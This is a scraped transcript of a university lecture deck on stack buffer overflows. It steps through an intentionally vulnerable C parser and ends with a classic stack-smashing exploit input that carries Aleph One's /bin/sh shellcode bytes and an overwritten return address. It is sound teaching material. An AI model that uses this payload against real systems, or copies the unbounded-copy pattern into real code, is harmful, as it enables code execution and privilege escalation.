Software Security.

Slides:



Advertisements
Similar presentations
Smashing the Stack for Fun and Profit
Advertisements

Defenses. Preventing hijacking attacks 1. Fix bugs: – Audit software Automated tools: Coverity, Prefast/Prefix. – Rewrite software in a type safe languange.
Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 10: Buffer Overflow.
Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 11 – Buffer Overflow.
Lecture 16 Buffer Overflow modified from slides of Lawrie Brown.
Part III Counter measures The best defense is proper bounds checking but there are many C/C++ programmers and some are bound to forget  Are there any.
Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 26 th 2007 CSCI 6268/TLEN 5831, Fall 2007.
Breno de MedeirosFlorida State University Fall 2005 Buffer overflow and stack smashing attacks Principles of application software security.
Buffer Overflows By Tim Peterson Joel Miller Dan Block.
1 Information Security – Theory vs. Reality , Winter 2011 Lecture 8: Control hijacking attacks Eran Tromer Slides credit: Dan Boneh, Stanford.
Windows XP SP2 Stack Protection Jimmy Hermansson Johan Tibell.
Control Hijacking Attacks Note: project 1 is out Section this Friday 4:15pm.
Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Maziéres, Dan Boneh
Exploits Against Software and How To Avoid Them Nicolas T. Courtois - University College of London.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.
Lecture 0 Appendix on Implementation Threats Material from Warren Page & Chpt 11, Information Security by Mark Stamp.
Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.
Mitigation of Buffer Overflow Attacks
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 10 “Buffer Overflow”.
Buffer Overflow CS461/ECE422 Spring Reading Material Based on Chapter 11 of the text.
Topic 2d High-Level languages and Systems Software
Avishai Wool, lecture Introduction to Information Security Lecture 1.
Smashing the Stack Overview The Stack Region Buffer Overflow
Overflows & Exploits. In the beginning 11/02/1988 Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating,
Buffer Overflow Proofing of Code Binaries By Ramya Reguramalingam Graduate Student, Computer Science Advisor: Dr. Gopal Gupta.
Buffer Overflow Group 7Group 8 Nathaniel CrowellDerek Edwards Punna ChalasaniAxel Abellard Steven Studniarz.
Buffer Overflow Attack Proofing of Code Binary Gopal Gupta, Parag Doshi, R. Reghuramalingam, Doug Harris The University of Texas at Dallas.
A Tool for Pro-active Defense Against the Buffer Overrun Attack D. Bruschi, E. Rosti, R. Banfi Presented By: Warshavsky Alex.
JMU GenCyber Boot Camp Summer, Introduction to Penetration Testing Elevating privileges – Getting code run in a privileged context Exploiting misconfigurations.
Buffer overflow and stack smashing attacks Principles of application software security.
CS 155 Section 1 PP1 Eu-Jin Goh. Setting up Environment Demo.
Buffer Overflows Taught by Scott Coté.-. _ _.-. / \.-. ((___)).-. / \ /.ooM \ / \.-. [ x x ].-. / \ /.ooM \ -/ \ /-----\-----/---\--\ /--/---\-----/-----\ / \-
CNIT 127: Exploit Development Ch 14: Protection Mechanisms.
Information Security - 2. A Stack Frame. Pushed to stack on function CALL The return address is copied to the CPU Instruction Pointer when the function.
Foundations of Network and Computer Security J J ohn Black CSCI 6268/TLEN 5550, Spring 2013.
Security Attacks Tanenbaum & Bo, Modern Operating Systems:4th ed., (c) 2013 Prentice-Hall, Inc. All rights reserved.
Slides by Kent Seamons and Tim van der Horst Last Updated: Nov 11, 2011.
CNIT 127: Exploit Development Ch 8: Windows Overflows Part 1.
Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade Crispin Cowan SANS 2000.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2014.
Chapter 10 Buffer Overflow 1. A very common attack mechanism o First used by the Morris Worm in 1988 Still of major concern o Legacy of buggy code in.
1 Introduction to Information Security , Spring 2016 Lecture 2: Control Hijacking (2/2) Avishai Wool.
CS703 - Advanced Operating Systems By Mr. Farhan Zaidi.
Control Hijacking: Defenses
Let’s look at an example
Mitigation against Buffer Overflow Attacks
Buffer Overflow Buffer overflows are possible because C doesn’t check array boundaries Buffer overflows are dangerous because buffers for user input are.
Basic Control Hijacking Attacks
The Hardware/Software Interface CSE351 Winter 2013
Basic Memory Corruption Attacks
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow II: Defense Techniques Cliff Zou Spring 2016.
Basic Memory Corruption Attacks
CSC 495/583 Topics of Software Security Return-oriented programming
CS 465 Buffer Overflow Slides by Kent Seamons and Tim van der Horst
Advanced Buffer Overflow: Pointer subterfuge
Preventing Buffer Overflow Attacks
Understanding Program Address Space
Foundations of Network and Computer Security
Machine Level Representation of Programs (IV)
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow II: Defense Techniques Cliff Zou Spring 2011.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2015.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow II: Defense Techniques Cliff Zou Spring 2009.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2016.
Understanding and Preventing Buffer Overflow Attacks in Unix
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2013.
CNT4704: Analysis of Computer Communication Network Special Topic: Buffer Overflow II: Defense Techniques Cliff Zou Fall 2011.
Return-to-libc Attacks
Presentation transcript:

Software Security

Attacks against OS Exploiting software Exploiting authentication Exploiting communication

Linux (32-bit) process memory layout -0xFFFFFFFF Reserved for Kernel user stack shared libraries run time heap static data segment text segment (program) unused

text segment (program) callee saved registers Stack Frame -0xC0000000 -0x40000000 -0x08048000 -0x00000000 user stack shared libraries run time heap static data segment text segment (program) unused arguments return address stack frame pointer exception handlers local variables callee saved registers To previous stack frame pointer To the point at which this function was called

Stack Frame A quick example to illustrate multiple stack frames 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘\n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: out[i] = ‘\0’; 8:} 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; 13: if (cmd[0] == ‘G’) 14: if (cmd[1] == ‘E’) 15: if (cmd[2] == ‘T’) 16: if (cmd[3] == ‘ ’) 17: header_ok = 1; 18: if (!header_ok) return -1; 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } A quick example to illustrate multiple stack frames

What are buffer overflows? args ret address frame ptr local variables callee saved registers 0x0804a008 0x080485a2 0xbffff778 0xbffff6c4 0x00000001 0xbfef20dc 0xbf02224c 0x00000000 . 0x41414141 0x20544547 parse’s frame parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘\n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: out[i] = ‘\0’; 8:} args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff760 fp 0xbffff75c return address 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } Gcc 4.4.5 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000000 args ret address frame ptr local variables callee saved registers out (input file) 0xbffff6b0 in file 0xbffff6ac return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

What are buffer overflows? 0x0804a008 0x080485a2 0xbffff778 0xbffff6c4 0x00000001 0xbfef20dc 0xbf022261 0x00000000 . 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘\n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: out[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000000 out file (input file) 0xbffff6b0 in 0xbffff6ac return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

What are buffer overflows? 0x0804a008 0x080485a2 0xbffff778 0xbffff6c4 0x00000001 0xbfef20dc 0xbf026161 0x00000000 . 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘\n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: out[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000001 out file (input file) 0xbffff6b0 in 0xbffff6ac return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

What are buffer overflows? 0x0804a008 0x080485a2 0xbffff778 0xbffff6c4 0x00000001 0xbfef20dc 0xbf616161 0x00000000 . 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘\n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: out[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000002 out file (input file) 0xbffff6b0 in 0xbffff6ac return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

What are buffer overflows? 0x0804a008 0x080485a2 0xbffff778 0xbffff6c4 0x00000001 0xbfef20dc 0x61616161 0x00000000 . 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘\n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: out[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000003 out file (input file) 0xbffff6b0 in 0xbffff6ac return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

What are buffer overflows? 0x0804a008 0x080485a2 0xbffff778 0xbffff6c4 0x00000001 0xbfef2061 0x61616161 0x00000000 . 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!='\n') { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: out[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000004 out file (input file) 0xbffff6b0 in 0xbffff6ac return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

What are buffer overflows? 0x0804a008 0x080485a2 0xbffff778 0xbffff6c4 0x00000001 0xbfef6161 0x61616161 0x00000000 . 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!='\n') { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: out[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000005 out file (input file) 0xbffff6b0 in 0xbffff6ac return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

What are buffer overflows? 0x0804a008 0x080485a2 0xbffff778 0xbffff6c4 0x00000001 0xbf616161 0x61616161 0x00000000 . 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!='\n') { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: out[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000005 out file (input file) 0xbffff6b0 in 0xbffff6ac return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

What are buffer overflows? 0x0804a008 0x080485a2 0xbffff778 0x61616161 0x00000000 . 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!='\n') { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: out[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x0000000d out file (input file) 0xbffff6b0 in 0xbffff6ac return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

What are buffer overflows? 0x61616161 0x00000000 . 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!='\n') { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: out[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000019 out file (input file) 0xbffff6b0 in 0xbffff6ac return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

What are buffer overflows? 0x61616161 0x00000000 . 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!='\n') { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: out[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000025 out file (input file) 0xbffff6b0 in 0xbffff6ac return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

What are buffer overflows? 0x61616161 0x00000000 . 0x41414141 0x20544547 0xbffff6c4 0x00000001 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!='\n') { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: out[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000025 out file (input file) 0xbffff6b0 in 0xbffff6ac return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 stack frame ptr And when you try to return from parse… 0xbffff69c i … SEGFAULT, since 0x61616161 is not a valid location to return to. (Unallocated)

Basic Stack Exploit Overwriting the return address allows an attacker to redirect the flow of program control Instead of crashing, this can allow arbitrary code to be executed Code segment called “shellcode” Example: the execve system call is used to execute a file With the correct permissions, execve(“/bin/sh”) can be used to obtain a root-level shell.

crafted return address Basic Stack Exploit So suppose we overflow with a string that looks like the assembly of: Shell Code: exec(“/bin/sh”) To previous stack frame pointer To the instruction at which this function was called To previous stack frame pointer To the instruction at which this function was called arguments return address stack frame pointer buffer arguments return address stack frame pointer buffer ShellCode crafted return address buffer “\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh” When the function exits, the user gets shell !!! Note: shellcode runs in stack. (exact shell code by Aleph One)

callee saved registers Basic Stack Exploit 0x0804a008 0x080485a2 0x61616161 0x00000000 . 0xfffff764 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!='\n') { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff7d8 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[25,26,27,28] cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000019 out file (input file) 0xbffff6b0 in GET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xffAAAA\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh 0xbffff6ac return address 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

callee saved registers Basic Stack Exploit 0x0804a008 0x08048564 0x61616161 0x00000000 . 0xfffff764 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!='\n') { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff7d8 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[25,26,27,28] cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000019 out file (input file) 0xbffff6b0 in GET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xffAAAA\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh 0xbffff6ac return address 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

callee saved registers Basic Stack Exploit 0x0804a008 0x0804f764 0x61616161 0x00000000 . 0xfffff764 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!='\n') { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff7d8 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[25,26,27,28] cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000019 out file (input file) 0xbffff6b0 in GET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xffAAAA\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh 0xbffff6ac return address 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

callee saved registers Basic Stack Exploit 0x0804a008 0x08fff764 0x61616161 0x00000000 . 0xfffff764 0x41414141 0x20544547 parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!='\n') { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff7d8 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[25,26,27,28] cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000019 out file (input file) 0xbffff6b0 in GET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xffAAAA\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh 0xbffff6ac return address 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

